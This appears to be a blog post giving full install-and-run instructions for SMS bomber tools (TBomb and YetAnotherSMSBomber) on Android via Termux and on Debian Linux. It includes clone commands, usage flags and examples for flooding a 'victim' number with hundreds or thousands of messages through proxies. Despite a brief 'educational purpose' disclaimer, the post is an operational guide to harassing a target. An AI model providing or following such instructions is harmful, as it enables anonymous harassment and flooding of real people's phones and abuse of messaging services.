HOW TO SEND UNLIMITED NUMBER OF MESSAGES ANONYMOUSLY- ILLEGAL (NEVER USE SUCH THING)
ONLY FOR EDUCATIONAL PURPOSE I AM NOT RESPONSIBLE FOR THE MISUSE OF SUCH TOOLS AVAILABLE ON INTERNET.
FOR ANDROID-
THERE ARE 2 WAYS
1. TERMUX- USE TOOLS LIKE -TBOMB (LIMITED 500 SMS)
2. YETANOTHERSMSBOMBER(UNLIMITED)
FOR LINUX-: LINUX SAME WAY BUT DIFFERENT TOOLS LIKE QUARK.(YOU CAN ALSO USE TBOMB AND YETANOTHER SMS BOMBER)
HOW TO SEND OR USE THIS TOOL OR INSTALL -:
FOR NOOB- FIRST INSTALL TERMUX IN ANDROID FROM PLAYSTORE
THEN ENTER COMMAND APT UPDATE
AND THEN APT UPGRADE
AFTER THAT USE COMMAND- git clone https://github.com/TheSpeedX/TBomb
then pkg install git -y
pkg install python -y
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
./TBomb.sh
use it one by one and you will the result.
For Debian-based GNU/Linux distributions
To use the application, type in the following commands in GNU/Linux terminal.
sudo apt install git
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
bash TBomb.sh
NOW TO ENTER YOUR COUNTRY CODE WITHOUT (+) I.E. 91
THEN MOBILE NUMBER OF VICTIM.
FOR YETANOTHER SMS BOMBER-
Instructions for Android
Download Termux from the Play Store
Open Termux and enter the following commands:
# Install Dependencies: pkg install git python -y # Clone this repo git clone https://github.com/AvinashReddy3108/YetAnotherSMSBomber.git # Move into working directory. cd YetAnotherSMSBomber # Install the requirements. pip3 install -r requirements.txtInstructions for Debian-based GNU/Linux distributions:
# Install Dependencies: sudo apt install git python3 python3-pip # Clone this repo git clone https://github.com/AvinashReddy3108/YetAnotherSMSBomber.git # Move into working directory. cd YetAnotherSMSBomber # Install the requirements. pip3 install -r requirements.txtOptions
You can also read this via
python3 bomber.py -h
orpython3 bomber.py --help
YetAnotherSMSBomber - A clean, small and powerful SMS bomber script. Usage: bomber.py [--config-path/-c] [--num/-N] [--country/-C] [--threads/-T] [--timeout/-t] [--proxy/-P] [--verbose/-v] [--verify/-V] [-h/--help] TARGET Positional arguments: TARGET Target mobile number without country code. Optional arguments: --config-path, -c Path to API config file. (NOTE: the file must be in JSON format!) (default: 'api_config.json') --num, -N Number of SMSs to send to TARGET. (default: 30) --country, -C Country code without (+) sign. (default: 91) --threads, -T Max number of concurrent HTTP(s) requests. (default: 15) --timeout, -t Time (in seconds) to wait for an API request to complete. (default: 10) --proxy, -P Use proxy for bombing. (Recommended for large number of SMSs) --verbose, -v Enables verbose output, for debugging. --verify, -V To verify all providers are working or not. -h, --help Display this message. Use this for fun, not for revenge or bullying!
Examples
# The default - 25 threads, 50 SMSs, Country Code: +91 python3 bomber.py <TARGET> # Custom SMS count and proxy. python3 bomber.py --num 1000 --proxy <TARGET> python3 bomber.py -N 1000 -P <TARGET> # Custom API config file and proxy. python3 bomber.py --config-path "./config.json" --proxy <TARGET> python3 bomber.py -c "./config.json" -P <TARGET> # Here's how you use all possible parameters to your taste. python3 bomber.py --proxy --num 500 --country 91 --timeout 20 <TARGET> python3 bomber.py -p -N 500 -c 91 -T 30 -t 20 <TARGET>
Comments
Post a Comment